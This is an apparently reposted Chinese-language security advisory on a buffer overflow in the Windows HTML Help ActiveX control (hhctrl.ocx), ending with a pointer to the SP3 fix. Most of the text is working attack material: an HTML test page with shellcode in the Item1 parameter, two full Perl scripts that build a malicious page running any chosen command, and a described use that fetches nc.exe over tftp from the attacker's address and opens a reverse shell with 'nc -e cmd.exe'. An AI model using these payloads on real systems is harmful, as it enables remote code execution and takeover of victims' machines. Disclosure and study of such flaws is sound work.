Microsoft Windows HTML Help ActiveX控件存在多个漏洞发布时间:2002-05-31 更新时间:2002-08-02 严重程度:中 威胁程度:普通用户访问权限 错误类型:边界检查错误 利用方式:客户机模式 BUGTRAQ ID:4857 受影响系统 Microsoft Windows 2000 Advanced Server SP2详细描述 HTML Help ActiveX control (Hhctrl.ocx)是Microsoft HTML帮助的一部分系统,设计用于与IE提供帮助功能。 HTML Help ActiveX control (Hhctrl.ocx)存在缓冲溢出攻击,由于其中的Winhelp命令对其中的一个参数子项(item)的边界缺少正确检查,这个子项用于指定Winehelp主题中winhelp(.hlp)文件的存储路径,如果攻击者构造的页面中这个子项数值超长,当其他用户处理时可导致缓冲溢出,也可能存在执行任意代码的可能。 目前没有具体细节。 测试代码 <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE="^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð3ÀPhcalc^Í4$ƒÀPV¸¯§éw^?Ð3ÀP¾”^Ïéw^?ÖAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGH^ЃÆ^?ægMyWindow"><PARAM NAME="Item2" VALUE="NGS Software LTD"></OBJECT> <SCRIPT>winhelp.HHClick()</SCRIPT> ========================================================== Winhlp32.exe Buffer Overflow Exploit Code ------------------------------------------------------------------------ SUMMARY Attached is proof of concept code / exploit code for the winhlp32 buffer overflow vulnerability. The shell code is relatively small but effective if used correctly. The perl script takes a command to execute (WinExec,SW_HIDE) and a html output file. There are two versions included with this advisory: * HelpMe.pl that was written to work with kernel32.dll version 5.0.2195.4272 * HelpMe2.pl that was written to work with all other machines, kernel32.dll version 5.0.2195.2778 DETAILS Exploit: The exploit does the following: 1) Executes tftp.exe -i my.ip.address get nc.exe c:\winnt\system32\nc.exe 2) Executes nc.exe my.ip.address 80 -e cmd.exe If the exploit executes correctly exitprocess() will report no error. HelpMe2.pl: # Winhlp32.exe Remote Buffer Overrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com # For use as proof of concept ### Amended for use with kernel32.dll version 5.0.2195.2778 ####### Kernell32 jmp ebx 77E87793 $sploit = "\x55\x8b\xec\x8b\xc3". #Fixed from previous version "\xbe\xff\xff\xff\xff". "\x81\xEE\x85\x85\x85\x85". "\x83\xc0\x01". "\x8b\x10". "\x3b\xd6". "\x75\xf7". "\x8b\xd8". "\x83\xc3\x01". "\x80\x6b\x03\x41". "\x8b\x7b\x04". "\x81\xff\x58\x58\x58\x58". "\x75\xEE". "\x81\x6b\x04\x58\x58\x58\x58". "\x33\xf6". "\x56". "\x83\xc0\x04". "\x50". "\xbb\xaf\xa7\xe9\x77". # mov ebx, 0x77e9a7af winexec() address "\xff\xd3"; #call ebx $exitproc = "\xBB\x95\x8f\xe9\x77". "\x83\xeb\x01". "\xff\xd3"; #77e98f94 + 1 for exit proc $RET = "\x24\xF1\x5d\x01"; #$EIP2 = "\x93\x77\xe8\x77"; # This works on kernel32.dll version 5.0.2195.4272 $EIP2 = "\xDE\x16\xe8\x77"; #77E816DE # direct jump = 0006FBD4 ##$EIP2 = "\xd4\xfb\x06\x00"; print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n"; print "Enter Command to execute: "; $command =<STDIN>; print "Enter Output File: "; $outputfile =<STDIN>; chomp $command; chomp $outputfile; open(INFILE,">$outputfile"); $command = encode($command); $nn = 123 - length($command); $nops = "\x90" x $nn; $exploit = $sploit . "zzzz". $command .'XXXX'. $nops .$exitproc. $RET $EIP2; $f1= <<"file1"; <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE='file1 chomp $f1; $f2= <<"file2"; '><PARAM NAME="Item2" VALUE="Sec-1 LTD"></OBJECT><SCRIPT>winhelp.HHClick()</SCRIPT> file2 print INFILE $f1.$exploit.$f2; sub encode($command){ $lofcmd =length($command); $i = 0; for ($i ;$i < $lofcmd; $i++){ $chartoconvert = substr($command,$i,1); # pull out each character $chartoconvert = ord($chartoconvert); # convert to a dec for ($b=0; $b < 65; $b++){ $chartoconvert++ ; } $tmpchr = chr($chartoconvert); #convert back to chr $newchar = $newchar . $tmpchr; } print $newchar; return $newchar; } HelpMe.pl: # Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com # For use as proof of concept # Kernel32.dll version 5.0.2195.4272 ####### Kernell32 jmp ebx 77E87793 $sploit = "\x55\x8b\xec\x8b\xc3". #xc5 is ebp change if error "\xbe\xff\xff\xff\xff". "\x81\xEE\x85\x85\x85\x85". "\x83\xc0\x01". "\x8b\x10". "\x3b\xd6". "\x75\xf7". "\x8b\xd8". "\x83\xc3\x01". "\x80\x6b\x03\x41". "\x8b\x7b\x04". "\x81\xff\x58\x58\x58\x58". "\x75\xEE". "\x81\x6b\x04\x58\x58\x58\x58". "\x33\xf6". "\x56". "\x83\xc0\x04". "\x50". "\xbb\x94\xee\xe8\x77". # mov ebx, 0x77e8ee94 winexec() address "\xff\xd3"; #call ebx $exitproc = "\xBB\x5d\xa9\xe8\x77". "\x83\xeb\x01". "\xff\xd3"; $RET = "\x24\xF1\x5d\x01"; $EIP2 = "\x93\x77\xe8\x77"; # This works #$EIP2 = "\xf6\xbf\x30\x78"; # direct jump = 0006FBD4 ##$EIP2 = "\xd4\xfb\x06\x00"; print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n"; print "Enter Command to execute: "; $command =<STDIN>; print "Enter Output File: "; $outputfile =<STDIN>; chomp $command; chomp $outputfile; open(INFILE,">$outputfile"); $command = encode($command); $nn = 123 - length($command); $nops = "\x90" x $nn; $exploit = $sploit . "zzzz". $command .'XXXX'. $nops .$exitproc. $RET $EIP2; $f1= <<"file1"; <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE=' file1 chomp $f1; $f2= <<"file2"; '><PARAM NAME="Item2" VALUE="Sec-1 LTD"></OBJECT> <SCRIPT>winhelp.HHClick()</SCRIPT> file2 print INFILE $f1.$exploit.$f2; sub encode($command){ $lofcmd =length($command); $i = 0; for ($i ;$i < $lofcmd; $i++){ $chartoconvert = substr($command,$i,1); # pull out each character $chartoconvert = ord($chartoconvert); # convert to a dec for ($b=0; $b < 65; $b++){ $chartoconvert++ ; } $tmpchr = chr($chartoconvert); #convert back to chr $newchar = $newchar . $tmpchr; } print $newchar; return $newchar; } ADDITIONAL INFORMATION The information has been provided by <mailto:garyo@sec-1.com> Gary O'leary-Steele. ======================================= 解决方案 请下载使用SP3: Microsoft Windows 2000 Advanced Server SP2: Microsoft Upgrade Windows 2000 SP3 http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lang.asp Microsoft Windows 2000 Datacenter Server SP2: Microsoft Windows 2000 Professional SP2: Microsoft Upgrade Windows 2000 SP3 http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lang.asp Microsoft Windows 2000 Server SP2: Microsoft Upgrade Windows 2000 SP3 http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lang.asp 相关信息 Next Generation Security Software. 参考:http://www.nextgenss.com/vna/ms-whelp.txt |
